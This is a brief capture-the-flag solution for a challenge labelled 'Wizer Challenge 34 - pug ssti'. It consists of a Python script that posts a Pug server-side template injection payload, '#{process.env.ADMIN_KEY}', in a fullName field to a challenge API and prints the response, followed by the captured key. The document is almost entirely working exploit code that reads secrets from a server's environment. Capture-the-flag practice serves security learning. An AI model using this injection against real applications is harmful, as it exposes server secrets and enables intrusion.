Wizer - Challenge 34 - pug ssti

Exploit

import requests


url = "https://chal34-fh845g.vercel.app/api/getWelcomeMessage"


data = {
    "fullName": "#{process.env.ADMIN_KEY}",
}

r = requests.post(url, json=data)

print(r.text)


# Key: J4589J98H4FG89HY34F89HI8FJMN349JF9J90JKCV490IK